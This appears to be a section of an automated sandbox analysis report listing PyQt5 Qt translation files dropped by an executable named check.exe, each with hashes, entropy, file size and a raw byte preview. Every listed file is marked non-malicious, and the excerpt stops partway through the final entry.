Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10704
Entropy (8bit):	4.481291573289571
Encrypted:	false
SSDEEP:	192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
MD5:	9EDF433AB9EE5FC7CF7782370150B26A
SHA1:	A918AE15A0DF187C7789BE8599A80E279F039964
SHA-256:	FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
SHA-512:	88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...\|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10922
Entropy (8bit):	4.459946393010639
Encrypted:	false
SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
